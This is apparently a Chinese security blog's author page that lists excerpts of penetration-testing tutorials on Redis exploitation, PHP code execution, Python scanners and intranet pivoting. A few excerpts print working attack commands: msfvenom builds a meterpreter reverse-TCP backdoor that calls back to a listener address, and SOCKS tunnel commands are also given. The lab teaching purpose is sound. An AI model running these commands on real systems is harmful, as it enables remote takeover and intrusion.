自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

划水的小白白

保持热爱

  • 博客(18)
  • 收藏
  • 关注

原创 网络安全进阶篇(十二章-4)redis攻防总结(下)

五、利用主从复制RCE5.0 通过写入文件getshell的缺点5.1 定义5.2 利用工具的使用5.3 注意点六、本地redis主从复制RCE 反弹shell6.1 第“ 五 ”部分的缺点6.2 攻击机器执行命令6.3 目标机器执行命令七、ssrf redis 反弹shell(以网鼎杯的一道题目来介绍)7.0 补充知识之0.0.0.0与127.0.0.17.1 解题思路7.2 绕过条件判断的关键代码7.3 利用主从复制漏洞进行攻击7.4 附带通过gopher协议写webshel

2021-03-28 22:17:33 512

原创 网络安全进阶篇(十二章-3)redis攻防总结(上)

一、redis未授权访问1.1 定义1.2 未授权访问原因1.3 redis服务的搭建1.4 redis的配置1.5 加载配置文件启动redis服务1.6 查看redis服务是否启动1.7 使用攻击机器测试是否存在未授权1.8 Redis常用命令1.9 修复方法见“ 八 ”二、redis 写webshell2.1 命令2.2 访问测试写入的一句马2.3 执行命令的顺序可以稍微变化三、redis 密钥登录ssh3.1 不存在未授权的情况:3.2 写入root的条件(利用条件)

2021-03-28 21:15:51 632

原创 代码执行漏洞(代码审计的思路)

零、 开局上表演一、代码执行漏洞原理1.1 定义1.2例如1.3 RCE的概念1.4 本篇文章预计收获二、造成代码执行函数解析2.1 eval($a)函数2.2 assert($a)函数2.3 利用assert写木马2.4 preg_replace函数2.5 create_function匿名函数2.6 array_map函数(回调函数)2.7 特殊组合(双引号二次解析)三、实战3.0 靠技术手段达到重装别人网站的效果3.1 靶场模拟3.2 靶场总结:3.3一些补充

2021-03-27 01:14:43 744

原创 python编写工具08_用py写一个较为完整的脚本(多线程的目录扫描)

一、思路:二、工具初始化2.1 定义banner函数2.2 定义usage函数三、从命令行中获取参数3.1 用到的库:3.2 用法示例:3.2.1 打印出获取到的参数及其类型3.2.2 将获取的数据依次输出3.2.3 将获取后的参数,赋值后输出四、字典文件的读取与分配4.1 回顾with...as...结构4.2 为多线程分配字典4.3 优化(上边的程序有一定的问题)五、多线程访问5.1 使用函数5.2 函数用法5.3 原理理解5.4 最终代码(重要)六、总结写一个工具

2021-03-16 21:56:27 689

原创 python编写工具番外篇(2)--并发编程的学习(1)

一、简介1.为什么要引入多线程?总结:引入并发,就是为了提升程序运行速度2.有哪些程序提速的方法补充:在多线程并发中,cup与io是可以同时运行的。单个CPU场景下,单线程的原理:Cup处理一部分时,调用IO来处理,这个时候,cpu等着io处理完。然后在继续上次未完成的事情继续。-------------------------------------------------------------单个CPU场景下,多线程的原理:Cup处理一部分时,调用IO来处理,这个时候

2021-03-11 22:26:09 118

原创 python编写工具番外篇(1)--编写一个综合扫描器

前言:这是对之前文章内容的总结:使用方法:python3 work.py url如:python3 work.py 192.168.26.133源码:import requestsimport sys#url = "http://192.168.26.133"url = sys.argv[1]#定义基本属性headers = {"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Geck

2021-03-09 23:59:40 247

原创 python编写工具07_编写一个漏洞检测工具(ms15-034)

漏洞原理1. 一些问题 问: 为什么有成熟的工具了,我们还需要自己编写? 答: 一些漏洞刚刚被披露出来的时候,网上是没有对应的工具的。 这个时候就要求我们根据漏洞原理写出对应的POC代码,用来验证漏洞是否存在。2. 本文以ms15-034为例子。原理的话,本文就不占用篇幅取介绍了,可以自行百度。复现的话,本机装一个win7 sp1,开启iis服务即可。Win 7安装iis 7组件:https://jingyan.baidu.com/article/2fb0ba409

2021-03-09 22:06:43 461

原创 python编写工具06_获取HTTP服务器信息

结果:import requestsurl = 'http://195.200.176.186/' #此IP是从fofa上任意找的r = requests.get(url)print(r.headers)小优化(人性化输出):import requestsurl = 'http://195.200.176.186/' #此IP是从fofa上任意找的r = requests.get(url)print(r.headers)print("="*15)prin

2021-03-09 21:56:24 175

原创 python编写工具05_编写IIS PUT漏洞探测工具

一、工具原理漏洞原理和危害不在赘述,可以去这看看:https://www.cnblogs.com/-mo-/p/11295400.html使用HTTP options方法可以探测出服务器支持的HTTP方法二、工具编写:确认目标服务器发送OPTIONS请求确认结果中是否具有MOVE PUT结果:,,是字符串时,我们就可以通过find来寻找后续可以导入“ sys ”模块,来进行传递url定向扫描。find方法详细使用说明:https://www.runoob.co

2021-03-09 21:51:46 254

原创 python编写工具04_编写一个目录扫描工具

一、原理读取字典文件 拼接URL发送HTTP GET请求URL判断返回状态码信息,输出存在的目录二、字典文件读取with open(“filename.txt”,”r”) as f: #使用with .. as ..会自动关闭文件流;使用f = open(“filename.txt”,”r”) #需要close关闭文件流。#至于为什么非要关闭io流:https://www.zhihu.com/question/46263042.f.readline() #每次读取1行

2021-03-09 21:47:00 552

原创 python编写工具03_HTTP代理

代理服务器的设置前提:提前打开burp,监听默认的8080端口结果:代码:import requestsurl = "https://www.baidu.com"proxy = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}#设置代理服务器地址以及端口,这里是本地测试所以用的127.0.0.1r = requests.get(url,proxies = proxy,verify = False)

2021-03-09 21:38:44 231

原创 python编写工具02_HTTP请求

前提准备:登录页面1.html<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>haha</title></head><body> <form action="work1.php" method="get">

2021-03-09 21:30:27 184

原创 python编写工具01_获取服务器返回的基本信息

前言:好久没怎么写过代码了,最近来复习一下。简单脚本之获取返回状态码源码:import requestsurl = "https://www.baidu.com" #设置url为百度r = requests.get(url=url)print(r.url) #输出获取到的urlprint(r.status_code) #输出服务器返回状态码结果:简单脚本之获取请求url其实在上一个示例中,

2021-03-09 21:15:49 648

原创 内网渗透思路05之一次完整的域渗透

7.1 拿到内网中一台机器的权限(一般是低权限)。7.2 提取当前机器,但是失败7.3 横向扫描内网其他机器存活7.4 对存活机器进行常用端口探测7.5 爆破mysql7.6 通过数据库直接提权拿下内网中另一个机器7.7 通过新的机器收集域中的一些信息,获取到域控的明文账户密码7.8 先通过msf获取到域控的会话,在找个合适的机会登录域控7.9 增加内网路由,配置socks代理7.10 远程桌面登录域控7.11 一些其他补充

2021-03-07 12:30:35 1931 3

原创 内网渗透思路04之常见的内网渗透测试

4.1 拿到内网中一台机器的权限(一般是低权限)。 4.2 尝试提权到administrator或者system。 4.3 读取此服务器的账户密码 4.4 开启此机器的远程连接 //实战中可以没有这一步,看具体情况 4.5 扫描检测内网之中其他机器 4.6 使用msf将攻击机器增加到目标网络的路由内,并开启socks代理 4.7 使用hash传递进行内网横向移动攻击 4.8提取新机器hash 4.9 通过在线网站解密新机器的hash值

2021-03-07 11:18:34 1302

原创 内网渗透思路03之跨路由扫描

生成metasploit后门msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=12345 -f exe >/var/www/html/s.exekali监听use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.0.196set lport 12345exploit.

2021-03-07 10:35:05 855

原创 内网渗透思路02隧道技术之socket隧道

Socket的下载安装下载地址:http://sourceforge.net/projects/ssocks/受害者Linux服务器与攻击者的kali机器都需要下载socket文件(因为都不自带)下载之后,cd进入socket目录,使用下面命令进行编译并生成一个文件:./configure && make反向连接攻击机器kali开启监听Cd到socket下src目录./rcsocks -l 1088 -p 1080 -vv//等待远程Socks5服务器访问本地1080

2021-03-06 18:12:03 1031

原创 内网渗透思路01之MeTasploit来实现端口转发与端口映射

小说明:攻击者拿下“ 2008服务器 ”,不能直接访问内网中的“ 数据服务器 ”生成metasploit后门msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.115 lport=12345 -f exe >/var/www/html/ss.exe将木马文件上传至受害者机器攻击者Kali开启监听use exploit/multi/handlerset payload windows/meterpreter/.

2021-03-06 18:03:46 523

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除